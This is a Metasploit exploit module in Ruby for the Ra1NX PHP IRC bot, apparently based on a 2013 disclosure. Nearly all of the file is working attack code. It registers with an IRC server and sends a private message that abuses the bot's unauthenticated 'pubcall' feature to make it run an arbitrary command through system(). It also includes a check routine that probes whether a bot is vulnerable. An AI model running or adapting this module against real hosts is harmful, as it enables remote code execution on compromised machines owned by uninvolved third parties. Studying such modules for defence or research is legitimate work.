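##
# Title:             "Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution
# Date:              Mar 24 2013
# Author:            bwall
# Analysis:          https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0
# Affected versions: v2.0
# Test platform:     Ubuntu
#
# Ra1NX is an IRC-controlled PHP bot, i.e. malware that is already running on a
# compromised host. Its "pubcall" feature lets any IRC user who can PRIVMSG the
# bot invoke a PHP function by name with "<botnick> <function> <args>"; that
# path never consults the bot's owner-authentication, so an unauthenticated
# user can call system()/exec()-style functions with arbitrary arguments.
#
# Operator note: the process that ends up running the payload belongs to the
# owner of the infected machine, not to the botmaster. Make sure the target host
# (RHOST is the IRC server, the bot is a *client* of it) is in scope before use.
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Tcp

  # RFC 1459 nickname length limit. A longer or malformed NICK is replaced by a
  # random one (see #register) rather than rejected by the server.
  MAX_NICK_LEN = 9

  # IRC numeric replies meaning registration was refused:
  # 463 ERR_NOPERMFORHOST, 464 ERR_PASSWDMISMATCH.
  # Anchored to the start of a line (with the optional ":server" prefix) so the
  # digits inside a MOTD line or a nickname cannot produce a false
  # "connection not allowed". Ruby's ^ is line-anchored, which is what we want
  # for a multi-line server response.
  REG_REFUSED = /^(?::\S+\s+)?46[34]\s/

  def initialize(info = {})
    super(update_info(info,
      'Name'           => '"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution',
      'Description'    => %q{
        This module allows remote command execution on the PHP IRC bot Ra1NX by
        using the public call feature in private message to covertly bypass the
        authentication system.
      },
      'Author'         =>
        [
          'bwall <bwall[at]openbwall.com>' # Ra1NX analysis and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'],
          ['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'],
          ['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b']
        ],
      'Platform'       => ['unix', 'win'],
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          # 344 is the original author's budget; presumably derived from the
          # 512-byte IRC line limit minus the PRIVMSG framing - not re-derived here.
          'Space'       => 344,
          # The payload travels as a single IRC line. A CR or LF inside it would
          # terminate the PRIVMSG early and be parsed as a new IRC command, so
          # refuse payloads that contain them instead of sending a broken line.
          'BadChars'    => "\r\n",
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
            }
        },
      'Targets'        =>
        [
          ['Ra1NX', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 24 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(6667),
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
        OptString.new('NICK',         [true,  'IRC Nickname', 'msf_user']),
        OptString.new('RNICK',        [true,  'Nickname of Target IRC bot', 'jhl1']),
        OptString.new('PHP_EXEC',     [true,  'Function used to call payload', 'system'])
      ], self.class)
  end

  # Connects to the IRC server, registers, and asks the bot (via the
  # unauthenticated "@msg" pubcall) to echo a random token back to our nick.
  #
  # Returns CheckCode::Vulnerable when the token comes back, CheckCode::Safe when
  # it does not, and CheckCode::Unknown when the server refuses registration.
  def check
    connect
    begin
      response = register(sock)
      if response =~ REG_REFUSED
        print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
        return Exploit::CheckCode::Unknown
      end

      confirm_string = rand_text_alpha(8)
      # Ask the bot to message the token to the nick we actually registered
      # with (@nick), not datastore['NICK']: #register may have substituted a
      # random nick, in which case the bot would message nobody and the check
      # would wrongly report Safe.
      probe = "PRIVMSG #{rnick} :#{rnick} @msg #{@nick} #{confirm_string}\r\n"
      response = send_msg(sock, probe)
      vprint_status("#{rhost}:#{rport} - Server response:\n#{response}")
      quit(sock)
    ensure
      disconnect
    end

    if response =~ /#{Regexp.escape(confirm_string)}/
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  # Writes +data+ to +sock+ and drains whatever the server sends back, reading
  # with a 1 second timeout per chunk until a read returns nothing.
  #
  # Returns the concatenated response (possibly empty). EOF and read timeouts
  # are not errors here: they simply mean "nothing more to read".
  def send_msg(sock, data)
    sock.put(data)
    buffer = ''
    begin
      chunk = sock.get_once(-1, 1)
      until chunk.nil?
        buffer << chunk
        chunk = sock.get_once(-1, 1)
      end
    rescue EOFError, ::Timeout::Error
      # Server closed the connection or stopped talking; return what we have.
    end
    buffer
  end

  # Sends the IRC registration sequence (PASS, NICK, USER) on +sock+ and
  # returns the server's response so the caller can look for refusals.
  #
  # Side effect: stores the nickname actually used in @nick, because a NICK
  # option that is too long or contains characters illegal in an IRC nickname
  # (whitespace, comma - a CR/LF would even inject a second IRC command) is
  # replaced by a random one.
  def register(sock)
    msg = ''

    password = datastore['IRC_PASSWORD']
    if password && !password.empty?
      # NOTE(review): the password is sent as-is; a CR/LF in it would be
      # interpreted as a new IRC command. It is operator-supplied, so this is
      # left as a caveat rather than silently rewritten.
      msg << "PASS #{password}\r\n"
    end

    nick = datastore['NICK'].to_s
    if nick.empty? || nick.length > MAX_NICK_LEN || nick =~ /[\s,]/
      nick = rand_text_alpha(MAX_NICK_LEN)
      print_error("NICK is empty, longer than #{MAX_NICK_LEN} characters or contains whitespace; using #{nick}")
    end
    @nick = nick

    msg << "NICK #{nick}\r\n"
    msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"
    send_msg(sock, msg)
  end

  # Delivers the payload through the pubcall: a private message of the form
  # "<botnick> <php function> <encoded payload>" makes the bot call
  # PHP_EXEC(payload) without any authentication. Returns the server response.
  def ra1nx_command(sock)
    encoded = payload.encoded
    command_msg = "PRIVMSG #{rnick} :#{rnick} #{datastore['PHP_EXEC']} #{encoded}\r\n"
    send_msg(sock, command_msg)
  end

  # Politely ends the IRC session; no response is read.
  def quit(sock)
    sock.put("QUIT :bye\r\n")
  end

  # Registers with the IRC server and fires the payload at the bot.
  # The socket is always closed, even if registration or delivery raises.
  def exploit
    connect
    begin
      print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
      response = register(sock)
      if response =~ REG_REFUSED
        print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
        return
      end

      print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...")
      ra1nx_command(sock)
      quit(sock)
    ensure
      disconnect
    end
  end

  private

  # Nickname of the targeted bot (the PRIVMSG recipient and pubcall prefix).
  def rnick
    datastore['RNICK']
  end
end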